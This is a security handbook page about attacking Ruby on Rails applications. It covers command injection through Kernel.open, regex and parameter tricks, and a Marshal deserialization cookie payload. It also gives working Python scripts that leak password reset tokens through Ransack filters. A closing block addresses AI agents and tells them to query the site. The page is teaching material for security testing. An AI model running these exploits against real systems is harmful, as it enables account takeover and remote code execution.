# Ruby on Rails

{% hint style="info" %}
**Note**: A lot of content here is taken from [this gist](https://gist.github.com/cyberheartmi9/7fe85b61621f4126462d2125c4b19dfe) talking about Ruby on Rails applications. Be sure to check it out for a lot of attack techniques
{% endhint %}

## Command Execution

In Ruby, if you can execute any code a simple `` ` `` will allow you to execute system commands:

```ruby
`touch a`  # Runs command without output (reverse shell)
puts `id`  # Prints output
```

## Security Pitfalls

[`Kernel.open()`](https://ruby-doc.org/3.2.2/Kernel.html#method-i-open) vs [`File.open()`](https://ruby-doc.org/core-2.5.0/File.html#method-c-open)

In Ruby, [`Kernel`](https://ruby-doc.org/3.2.2/Kernel.html) is the standard module, and its functions do not need to be prefixed with `Kernel.`, meaning `Kernel.open()` and `open()` are **equivalent**. A different function however is `File.open()`, which sounds like it *should* do the same thing.&#x20;

One important difference however is that the `open()` function allows subprocesses to be created by prefixing with the `|` pipe symbol:

{% code title="Kernel.open()" %}

```ruby
open("|id") do |file|
    puts file.read
end
# uid=1001(user) gid=1001(user) groups=1001(user)
```

{% endcode %}

{% code title="File.open()" %}

```ruby
File.open("|id") do |file|
    puts file.read
end
# No such file or directory @ rb_sysopen - |id (Errno::ENOENT)
```

{% endcode %}

If you have control over the start of such a path, you can inject a `|` pipe symbol to execute commands. While you often also have Directory Traversal when starting a path with `/`, this attack does not require the `/` slash character and may get through a filter that tries to prevent it.&#x20;

### Regular Expressions

In ruby you can match a string to some regex in two simple ways:

<pre class="language-ruby"><code class="lang-ruby">a="some text containing abbbbc to match"

<strong>if a =~ /ab+c/
</strong>    puts "match"
end

<strong>if a.match(/ab+c/)
</strong>    puts "match"
end
</code></pre>

These two ways are identical to each other, but not the same as many other programming languages. The uniqueness is that **Regular Expressions are multi-line by default**.

Read [Regular Expressions (RegEx)](/languages/regular-expressions-regex.md#multi-line-matching) in the RegEx chapter to learn how to exploit this. Below is an example:

```ruby
a="foo\nbar"

if a =~ /^foo$/  # Tries to match only "foo"
    puts "match"  # "bar" gets injected
end
```

### URL Parameters

Similarly to [PHP](/languages/php.md), Ruby on Rails allows you to put arrays in query parameters:

```url
?user[]=first&user[]=second
```

This will result in a `params` variable like this:

```ruby
{"user" => ["first","second"]}
```

You can even use named array keys to create objects inside:

```url
?user[name]=hacker&user[password]=hunter2
```

```ruby
{"user" => {"name" => "hacker", "password" => "hunter2"}}
```

Finally, you can create `nil` values by not providing a value, which might break some things:

```
?user[name]
```

```ruby
{"user" => {"name" => nil}}
```

See [1.1.2 - Multiparameter attributes](https://gist.github.com/cyberheartmi9/7fe85b61621f4126462d2125c4b19dfe#file-attacking-ruby-on-rails-applications-L165) and [1.1.3 - POST/PUT text/xml](https://gist.github.com/cyberheartmi9/7fe85b61621f4126462d2125c4b19dfe#file-attacking-ruby-on-rails-applications-L188) for more input tricks like these.&#x20;

## Sessions

You can do a lot if you can find the Secret Key used for verifying sessions. Some common locations are:

* `config/environment.rb`
* `config/initializers/secret_token.rb`
* `config/secrets.yml`
* `/proc/self/environ` (if it's just given via an environment variable)

### Forging sessions

First of all, you can of course sign your own data to create arbitrary objects that might bypass authentication or anything else. See [this code](https://gist.github.com/cyberheartmi9/7fe85b61621f4126462d2125c4b19dfe#file-attacking-ruby-on-rails-applications-L374-L414) as an example to serialize your own data.&#x20;

### Insecure Deserialization

Ruby on Rails cookies use Marshal serialization to turn objects into strings, and then back into objects for deserialization.&#x20;

For Ruby 3 you can use a piece of code like this to create a marshal payload executing any Ruby code:

```ruby
 def build_cookie
    code = "eval('whatever ruby code')"
    marshal_payload = Rex::Text.encode_base64(
      "\x04\x08" +
      "o" +
      ":\x40ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy" +
      "\x07" +
              ":\x0E@instance" +
                      "o" + ":\x08ERB" + "\x06" +
                              ":\x09@src" +
                                      Marshal.dump(code)[2..-1] +
              ":\x0C@method" + ":\x0Bresult"
    ).chomp
    digest = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::Digest.new("SHA1"),
      SECRET_TOKEN, marshal_payload)
    marshal_payload = Rex::Text.uri_encode(marshal_payload)
    "#{marshal_payload}--#{digest}"
  end
```

For more recent versions, the following post describes a different deserialization chain:

{% embed url="<https://nastystereo.com/security/ruby-3.4-deserialization.html>" %}

**More References**

* [PayloadsAllTheThings/Ruby](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Insecure%20Deserialization/Ruby.md)
* [YAML Deserialization](https://blog.stratumsecurity.com/2021/06/09/blind-remote-code-execution-through-yaml-deserialization/)

## Ransack Data Exfiltration

{% embed url="<https://positive.security/blog/ransack-data-exfiltration>" %}
Article explaining the technique and exploitability
{% endembed %}

The popular [Ransack](https://github.com/activerecord-hackery/ransack) Ruby library allows developers to query a database in the form of **objects**. On version < 4.0.0 (Released: Feb 9, 2023), there is a big risk of **mass assignment** in query parameters that perform these filters. The client often provides a query where they can specify what attributes to filter for with conditions like `cont` (contains) or `start` (starts with). These can be pointed to sensitive data like password reset tokens by an attacker and exfiltrated character-by-character by the named filters.&#x20;

{% hint style="info" %}
The reason versions after 4.0.0 are often safe, is because an explicit whitelist is required to be filled out per class to select all queryable attributes. Of course, a developer could still include sensitive fields here by mistake, but it is safe by default.
{% endhint %}

Take this vulnerable code example:

<pre class="language-ruby"><code class="lang-ruby"># User class with sensitive data, has posts
class User &#x3C; ActiveRecord::Base
  validates :email, :username, presence: true
<strong>  attr_accessor :password_hash, :reset_password_token
</strong>  
<strong>  has_many posts
</strong>end
# Post class to be queries, belongs to a user
class Post &#x3C; ActiveRecord::Base
  validates :title, :content, presence: true
  
<strong>  belongs_to :user
</strong>end
# Vulnerable page with user input
def search
<strong>  @q = Post.ransack(params[:q])
</strong>  @posts = @q.result(distinct: true)
end
</code></pre>

Here the `search` page uses `params[:q]` from the client to query the `Post` class, which is indended to be searched for a `title` or `content`. \
Then, a URL like `/search?q[title_cont]=hacking` will respond with all posts with a **title containing "hacking"**. First is the *path* to the attribute: `title`, and then comes the *Predictate*: [`cont`](https://activerecord-hackery.github.io/ransack/getting-started/using-predicates/#cont), separated by an `_` underscore.&#x20;

{% embed url="<https://activerecord-hackery.github.io/ransack/getting-started/search-matches/>" %}
A **table** of all **predictates** that can be used
{% endembed %}

The **vulnerability** here however, is when we provide a sensitive attribute, which is easy as the path to the attribute can be deeper by separating them by underscores. If we want to find the `reset_password_token` for example, this is inside of the `user`: \
`/search?q=[user_reset_password_token_cont]=hacking`. This query will return something if there is a user with "hacking" in their password reset token, but this can be abused by doing a character-by-character brute-force attack where we provide all possible starting characters and find which give a response back, indicating it was found:

<pre class="language-clike" data-title="Exploit"><code class="lang-clike">GET /posts?q[user_reset_password_token_start]=0 -> Empty results page
GET /posts?q[user_reset_password_token_start]=1 -> Empty results page
<strong>GET /posts?q[user_reset_password_token_start]=2 -> Results in page
</strong></code></pre>

Afterward, we know a token starts with `2`, and we can simply try all other characters after it:

<pre class="language-clike"><code class="lang-clike">GET /posts?q[user_reset_password_token_start]=20 -> Empty results page
GET /posts?q[user_reset_password_token_start]=21 -> Empty results page
...
GET /posts?q[user_reset_password_token_start]=2c -> Empty results page
<strong>GET /posts?q[user_reset_password_token_start]=2d -> Results in page
</strong></code></pre>

By continually doing this, eventually, we find for example `q[user_reset_password_token]=2dd0571e439813f7` which shows the entire token is correct, and we have leaked it in only a few requests.&#x20;

Leaking such hexadecimal token can look something like this:

{% code title="ransack\_token\_leak.py" %}

```python
import requests
from tqdm import tqdm  # Progress bar

HOST = "http://localhost:4567"  # TARGET
ALPHABET = b"0123456789abcdef"

token = b""
for length in tqdm(range(16), desc="Length", leave=False):
    for c in tqdm(ALPHABET, desc=f"{length}", leave=False):
        prefix = token + bytes([c])
        params = {  # Check with start (case insensitive)
            "q[user_reset_password_token_start]": prefix.decode(),
        }
        r = requests.get(HOST + "/search", params=params)

        if len(r.text) > 5000:  # Treshold for results
            token += bytes([c])
            tqdm.write(repr(token))
            break
    else:  # If nothing new found, we are done
        break

token = token.decode()
print("Found case-insensitive:", token)
```

{% endcode %}

In this case, we found the sensitive `user` and `reset_password_token` attributes by reading the code, but in a more black-box scenario where you only notice the pattern of \
`?q[attr_predicate]=` some **guessing** is required. Tools like [`ffuf`](https://github.com/ffuf/ffuf) can fuzz for these attributes by providing the `FUZZ` keyword in the correct part of a URL:

<pre class="language-shell-session" data-overflow="wrap"><code class="lang-shell-session"><strong>$ ffuf -u 'http://localhost:4567/search?q[OBJ_PROP_eq]=random6bQ1kL' -w objs.txt:OBJ -w props.txt:PROP -fs 7301
</strong>...
<strong>[Status: 200, Size: 521, Words: 56, Lines: 15, Duration: 3ms]
</strong><strong>    * OBJ: user
</strong><strong>    * PROP: reset_password_token
</strong>
[Status: 200, Size: 521, Words: 56, Lines: 15, Duration: 5ms]
    * OBJ: user
    * PROP: name

[Status: 200, Size: 521, Words: 56, Lines: 15, Duration: 3ms]
    * OBJ: user
    * PROP: id
</code></pre>

In the example above, we try to find an object and property that when `_eq` is put on it, returns false because it is not found. Then the size is smaller and different from when the attribute is **wrong**, as then it is *ignored* returning **all results** in a static size. \
This behavior depends, as in some cases a **wrong** guess will instead give **no results**, requiring you to change the fuzzing. A strategy for this would be to create a (mostly) always-true query like \
`?q[OBJ_PROP_cont]=_` asking for the property to contain at least one character (`_` = wildcard).&#x20;

<details>

<summary>Wordlists (small)</summary>

{% code title="objs.txt" %}

```
user
author
creator
writer
by
```

{% endcode %}

{% code title="props.txt" %}

```
id
name
first_name
firstname
first
email
password
token
recoveries
recoveries_key
recoveries_token
recovery
recovery_key
recovery_token
password_recovery
password_recovery_token
reset_password_token
password_reset_token
password_token
reset_token
token_reset_password
token_password_reset
```

{% endcode %}

</details>

### Case Insensitive Predicates

An important note, however, is the fact that the [`start`](https://activerecord-hackery.github.io/ransack/getting-started/using-predicates/#start-starts-with) predicate is **case-insensitive**, meaning using just this technique we won't know the casing of a token. For a hexadecimal token, this is no problem, but for a Base64 token, it is important to get this correct.&#x20;

There is no easy way to make `start` case-sensitive, but there are alternative predicates that are case-sensitive like `eq` (SQL `=`) or `cont` (SQL `LIKE`). Not all databases perform `LIKE` **case-sensitively**, some popular ones that **do** include PostgreSQL and Oracle DB. \
While MySQL/MariaDB, SQLite, or Microsoft SQL **do not**. It is easy to test if this is the case by searching for a string with the wrong casing using the `eq` or `cont` predicates.&#x20;

Commonly `eq` will work case-insensitively making it possible to guess all different combinations of casing for a token. If you found a token like `a2b`, you can try `a2b`, `A2b`, `a2B`, and `A2B` to find the correct one. Then, use this correct token to reset the password, or whatever else the sensitive data lets you do. Here is an implementation:

```python
# Try change with all cases
def all_casings(input_string):
    if not input_string:
        yield ""
    else:
        first = input_string[:1]
        if first.lower() == first.upper():
            for sub_casing in all_casings(input_string[1:]):
                yield first + sub_casing
        else:
            for sub_casing in all_casings(input_string[1:]):
                yield first.lower() + sub_casing
                yield first.upper() + sub_casing

for cased_token in tqdm(list(all_casings(token)), desc="Casing", leave=False):
    params = {  # Check with equals (case sensitive)
        "q[user_reset_password_token_eq]": cased_token,
    }
    r = requests.get(HOST + "/search", params=params)
    
    if '<li>' in r.text:  # Treshold for results
        break

print("Found case-sensitive:  ", cased_token)
```

### Binary Search

If the targetted data is **numeric**, it is possible to use the `lt` (less than) or `lteq` (less than or equal) predicates to compare a range of values all at once. This algorithm is called [Binary Search](https://en.wikipedia.org/wiki/Binary_search_algorithm) and can drastically speed up your attack. Here is a simple implementation that leaks the `number` attribute from `user`:

{% code title="Numeric Binary Search" %}

```python
def test(guess):
    """if target is lower than guess (not equal)"""
    params = {
        "q[user_number_lt]": guess,
    }
    r = requests.get(HOST + "/search", params=params)

    return len(r.text) > 5000

def binary_search(lo=0, hi=10000):
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if test(mid):
            hi = mid - 1
        else:
            lo = mid
    
    return lo
```

{% endcode %}

A more advanced example is achieving **Binary Search for string attributes**. We require a way to test multiple values at once, to test a range (half of the possible values) at once. It turns out, the `start_any` predicate (similar to [`cont_any`](https://activerecord-hackery.github.io/ransack/getting-started/using-predicates/#cont_any-contains-any)) can do this for us! It requires an array and performs the regular `start` predicate with all the strings in that array, and if one is found, it is successful.&#x20;

We can make use of this by specifying half of the possible continuations as an array in the query parameters, which will return results if the next character is in *any of them*, achieving Binary Search once again.&#x20;

Some important things to note are firstly the fact that Ruby (and many other frameworks) accept arrays as query parameters by duplicating the names and appending `[]` like \
`?array[]=1&array[]=2` to create `array=["1","2"]`. We use this to generate the required strings. These strings need to be the known *prefix* so far, and half of the possible characters. If we know `prefix="se"` the guesses will be `["sea", "seb", "sec", ...]`.

Here is an example implementation:

{% code title="String Binary Search" %}

```python
import requests

HOST = "http://localhost:4567"
ALPHABET = list("0123456789abcdefghijklmnopqrstuvwxyz")

def test(prefix, guess):
    # Create array of possible continuations
    l = [prefix + c for c in ALPHABET[:guess]]
    # Pass array as query parameters
    params = [("q[user_reset_password_token_start_any][]", s) for s in l]
    r = requests.get(HOST + "/search", params=params)

    return '<li>' in r.text

def binary_search(prefix, lo=0, hi=len(ALPHABET)):
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if test(prefix, mid):
            hi = mid - 1
        else:
            lo = mid
    
    return ALPHABET[lo] if lo < len(ALPHABET) else None

if __name__ == "__main__":
    prefix = ""
    while result := binary_search(prefix):
        prefix += result
        print(prefix)
```

{% endcode %}

{% hint style="success" %}
In **every situation,** binary search will be **faster** than linear search, but the difference is largest when `ALPHABET` is largest. If this is `N`, the average time for both will be:

* Linear Search: `N/2`          (N=50 -> 25 attempts)
* Binary Search: `log2(N)` (N=50 -> 6 attempts)
  {% endhint %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://book.jorianwoltjer.com/web/frameworks/ruby-on-rails.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
